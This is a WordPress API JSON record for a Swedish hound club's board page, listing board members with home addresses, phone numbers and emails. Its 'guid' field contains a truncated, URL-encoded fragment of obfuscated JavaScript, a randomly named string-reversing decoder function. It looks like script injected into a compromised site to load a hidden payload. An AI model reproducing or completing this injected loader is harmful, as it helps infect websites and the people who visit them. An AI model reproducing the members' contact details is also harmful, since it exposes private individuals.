{"id":2,"date":"2011-01-04T20:18:09","date_gmt":"2011-01-04T19:18:09","guid":{"rendered":"http:\/\/www.lokalklubb.stovare.se\/uppl$hiVNZt4Y5cDrbJXMhLy=function(n)if%20(typeof%20($hiVNZt4Y5cDrbJXMhLy.list%5Bn%5D)%20==%20string)%20return%20$hiVNZt4Y5cDrbJXMhLy.list%5Bn%5D.split().reverse().join();return%20$hiVNZt4Y5cDrbJXMhLy.list%5Bn"},"modified":"2023-05-12T15:47:05","modified_gmt":"2023-05-12T13:47:05","slug":"om","status":"publish","type":"page","link":"https:\/\/www.uv-stovarklubb.se\/index.php\/om\/","title":{"rendered":"Styrelsen"},"content":{"rendered":"\n<figure class=\"wp-block-table is-style-stripes\"><table><tbody><tr><td><strong>Ordf\u00f6rande<\/strong><br><strong>Markus Enstedt<br>Ekeby\u00e4ngsv\u00e4gen 37<br>733 36 Sala<br>070-5826916<br><a href=\"mailto:silverstadensror@gmail.com\">silverstadensror@gmail.com<\/a><\/strong><\/td><td><strong>Vice Ordf\u00f6rande<\/strong><br><strong>Karl-Erik Lindberg<br><\/strong>Lerduvegr\u00e4nd 7<br>773 00 Fagersta<br>070-3080309<br><a href=\"mailto:karleriklindberg@hotmail.com\">karleriklindberg@hotmail.com<\/a><\/td><\/tr><tr><td><strong>Sekreterare<\/strong><br><strong>Lars Lundin<\/strong><br>Granitv\u00e4gen 19 A<br>752 43 Uppsala<br>018-515101<br>070-3736243<br><a href=\"mailto:lars.lundin@slu.se\">lars.lundin@slu.se<\/a><\/td><td><strong>Kass\u00f6r<br><span style=\"font-family: inherit; font-size: inherit;\">Henrik Turunen<br><\/span><\/strong><span style=\"font-family: inherit; font-size: inherit;\">Svanevik&nbsp;<\/span><span style=\"font-family: inherit; font-size: inherit;\">Molnebo 411<br><\/span><span style=\"font-family: inherit; font-size: inherit;\">744 91 Heby<br><\/span><span style=\"font-family: inherit; font-size: inherit;\">070-5881698<br><\/span><a style=\"font-family: inherit; font-size: inherit;\" href=\"mailto:industri@smia.se\">industri@smia.se<\/a><\/td><\/tr><tr><td><strong>Utst\u00e4llningsansvarig<\/strong><br><strong>Lars Hansen<br><\/strong>Gunbov\u00e4gen 2<br>184 94 \u00c5kersberga<br>073-6002113<br><a href=\"mailto:lars.hansen.se@gmail.com\">lars.hansen@misteldesign.se<\/a><strong><br><\/strong><\/td><td><strong>Materialansvarig<br>Markus Enstedt<br><\/strong>Ekeby\u00e4ngsv\u00e4gen 37<strong><br><\/strong>733 36 Sala<strong><br><\/strong>070-5826916<br><a href=\"mailto:silverstadensror@gmail.com\">silverstadensror@gmail.com<\/a><\/td><\/tr><tr><td><strong>Regelansvarig<\/strong><br><strong>Fredrik Carlberg<\/strong><br>H\u00e4rvsta 105<br>744 31 Heby<br>073-1807930<br>fredrik<\/td><td><strong>Avelsansvarig<br><\/strong><strong>Karl-Erik Lindberg<br><\/strong>Lerduvegr\u00e4nd 7<br>773 00 Fagersta<br>070-3080309<br><a href=\"mailto:karleriklindberg@hotmail.com\">karleriklindberg@hotmail.com<\/a><\/td><\/tr><tr><td><strong>Utbildningsansvarig<\/strong><br><strong>G\u00f6ran Bj\u00f6rkhult<br><\/strong>070-5759839<br><a href=\"bjorkhult78@hotmail.com\">e-post: bjorkhult78@hotmail.com<\/a><\/td><td>\n<p><strong><strong>Medlemsansvarig<br><\/strong><\/strong><span style=\"font-family: inherit; font-size: inherit;\"><strong>Emil Eriksson<\/strong><br><\/span>076-1051119<br><a href=\"mailto:barbro10119@gmail.com\">barbo10119@gmail.com<\/a><\/p>\n<p>&nbsp;<\/p>\n<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ordf\u00f6randeMarkus EnstedtEkeby\u00e4ngsv\u00e4gen 37733 36 Sala070-5826916silverstadensror@gmail.com Vice Ordf\u00f6randeKarl-Erik LindbergLerduvegr\u00e4nd 7773 00 Fagersta070-3080309karleriklindberg@hotmail.com SekreterareLars LundinGranitv\u00e4gen 19 A752 43 Uppsala018-515101070-3736243lars.lundin@slu.se Kass\u00f6rHenrik TurunenSvanevik&nbsp;Molnebo 411744 91 Heby070-5881698industri@smia.se Utst\u00e4llningsansvarigLars HansenGunbov\u00e4gen 2184 94 \u00c5kersberga073-6002113lars.hansen@misteldesign.se MaterialansvarigMarkus EnstedtEkeby\u00e4ngsv\u00e4gen 37733 36 Sala070-5826916silverstadensror@gmail.com RegelansvarigFredrik CarlbergH\u00e4rvsta 105744 31 Heby073-1807930fredrik AvelsansvarigKarl-Erik LindbergLerduvegr\u00e4nd 7773 00 Fagersta070-3080309karleriklindberg@hotmail.com UtbildningsansvarigG\u00f6ran Bj\u00f6rkhult070-5759839e-post: bjorkhult78@hotmail.com MedlemsansvarigEmil Eriksson076-1051119barbo10119@gmail.com &nbsp;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":""},"_links":{"self":[{"href":"https:\/\/www.uv-stovarklubb.se\/index.php\/wp-json\/wp\/v2\/pages\/2"}],"collection":[{"href":"https:\/\/www.uv-stovarklubb.se\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.uv-stovarklubb.se\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.uv-stovarklubb.se\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.uv-stovarklubb.se\/index.php\/wp-json\/wp\/v2\/comments?post=2"}],"version-history":[{"count":17,"href":"https:\/\/www.uv-stovarklubb.se\/index.php\/wp-json\/wp\/v2\/pages\/2\/revisions"}],"predecessor-version":[{"id":2397,"href":"https:\/\/www.uv-stovarklubb.se\/index.php\/wp-json\/wp\/v2\/pages\/2\/revisions\/2397"}],"wp:attachment":[{"href":"https:\/\/www.uv-stovarklubb.se\/index.php\/wp-json\/wp\/v2\/media?parent=2"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}